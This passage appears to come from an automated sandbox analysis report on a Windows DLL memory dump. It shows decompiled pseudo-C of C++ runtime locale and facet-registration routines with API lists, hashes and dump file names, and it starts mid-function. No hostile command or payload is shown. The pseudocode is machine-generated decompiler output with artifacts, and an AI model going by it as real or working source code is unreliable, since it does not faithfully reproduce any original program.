																																											E6DDF00AC(0x6de383cf, _t482, _t647, _t663, 0x14);
																																											E6DDD6653(_t682 - 0x14, 0);
																																											_t664 =  *0x6de96e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6DDB161C(0x6de96dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6DDD66BA(_t682 - 0x14);
																																												return E6DDF0075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6DDE15C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t682 - 0x20);
																																														E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t482, _t648, _t664, 0x14);
																																														E6DDD6653(_t682 - 0x14, 0);
																																														_t665 =  *0x6de96dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6DDB161C(0x6de96d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6DDD66BA(_t682 - 0x14);
																																															return E6DDF0075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6DDE162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6DDB1438(_t587);
																																																	E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de3851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6de3c0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6DDE542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6DDF0075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t649);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6de96dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t648);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6de96e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t647);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6de96dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t646);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6de96dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t645);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6de96de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t644);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6de96ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6DDD6FD3(__eflags, _t643);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6de96db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6DDD6FD3(__eflags, _t642);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6de96dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6DDD6FD3(__eflags, _t641);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6de96dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6DDD6FD3(__eflags, _t640);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6de96dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6DDD6FD3(__eflags, _t639);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6de96df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6DDD6FD3(__eflags, _t638);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6de96df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6DDD6FD3(__eflags, _t637);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6de96dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6DDD6FD3(__eflags, _t636);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6de96df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6DDD6FD3(__eflags, _t635);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6de96dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF37C
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF386
int.LIBCPMT ref: 6DDDF39D

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF415

Strings

pmm, xrefs: 6DDDF391

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pmm
API String ID: 651022567-4180949709
Opcode ID: 22ea6cd76316958ee0a4c01c4253b05f027229ad4df8d0e4e278af557804cbdd
Instruction ID: d15b1a60124ce90231f174f78074abb6308cc34ab0dd48562c828c1df48afa91
Opcode Fuzzy Hash: 22ea6cd76316958ee0a4c01c4253b05f027229ad4df8d0e4e278af557804cbdd
Instruction Fuzzy Hash: 6A11A0B6808519DBCF01FBA4C840AFDB774AF44318F27400AF621AB291DF749A06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDD4A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6DDF00AC(0x6de38144, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6deace80; // 0xb926b0
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6DDB161C(0x6de96b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6DDB171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6DDD66BA(_t61 - 0x14);
					return E6DDF0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6DDB18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t61 - 0x20);
							E6DDF3D74(_t61 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de38192, __ebx, _t57, _t59, 0xc);
							_t60 = E6DDD4A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6DDD5BFB();
							return E6DDF0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6DDD6FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6deace80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6ddd4a80
0x6ddd4a87
0x6ddd4a91
0x6ddd4a96
0x6ddd4a9f
0x6ddd4aa5
0x6ddd4aa8
0x6ddd4aad
0x6ddd4ab1
0x6ddd4ab6
0x6ddd4aba
0x6ddd4af5
0x6ddd4af8
0x6ddd4b04
0x6ddd4abc
0x6ddd4abe
0x6ddd4ac4
0x6ddd4aca
0x6ddd4ad2
0x6ddd4ad5
0x6ddd4b08
0x6ddd4b16
0x6ddd4b1b
0x6ddd4b23
0x6ddd4b2f
0x6ddd4b35
0x6ddd4b38
0x6ddd4b3b
0x6ddd4b3d
0x6ddd4b40
0x6ddd4b42
0x6ddd4b4a
0x6ddd4b53
0x6ddd4ad7
0x6ddd4ad7
0x6ddd4ada
0x6ddd4ade
0x6ddd4ae2
0x6ddd4aec
0x6ddd4aef
0x00000000
0x6ddd4aef
0x6ddd4ac0
0x6ddd4ac0
0x00000000
0x6ddd4ac0
0x6ddd4abe

APIs

__EH_prolog3.LIBCMT ref: 6DDD4A87
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD4A91
int.LIBCPMT ref: 6DDD4AA8

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD4AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD4AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD4B16

Strings

4km, xrefs: 6DDD4A9A

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4km
API String ID: 651022567-3804071703
Opcode ID: 4dd3f244ff24e84071d52a1992eaaaf1fd28732f779572d21d96b7ebc24ab3c7
Instruction ID: 481c63c3416ee030420c5208cba10d68e514b425c0fdeef0a988df0856473742
Opcode Fuzzy Hash: 4dd3f244ff24e84071d52a1992eaaaf1fd28732f779572d21d96b7ebc24ab3c7
Instruction Fuzzy Hash: A711CEB590822ADBCF00FBA4C840AFD7774AF18318F260508F611AB290EF709A05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6DE1E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6DE1F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6de1da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6de40f34);
					_push( *0x6de40dec);
					E6DE1E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6de40dec;
					while(1) {
						L2:
						_t246 = E6DE2D470(_t430, 0x351, 0x6de40f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6de40f34);
							_push( *_t373);
							E6DE1E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6de40e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6DE1CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6DE1CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6DE1CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6DE1CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6DE1CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6de9506c; // 0x657f4f7b
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6DE1E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6DE1DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6de1da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6DE2D60D(_t447, 0x6de40f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6de40dec;
													_v460 = 1;
													do {
														_t268 = E6DE1ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6de40e1c;
													} while (_t365 <= 0x6de40e1c);
													_t362 = _v472 + 2;
													_t269 = E6DE2D5BD(_t379, _t362, 0x6de40f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6DE2D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6DE12188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6de9506c; // 0x657f4f7b
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6DE1D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6DE1DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6DE1F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6DE191A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6DE12188();
																					asm("int3");
																					_t295 =  *0x6de976f0; // 0xba1de0
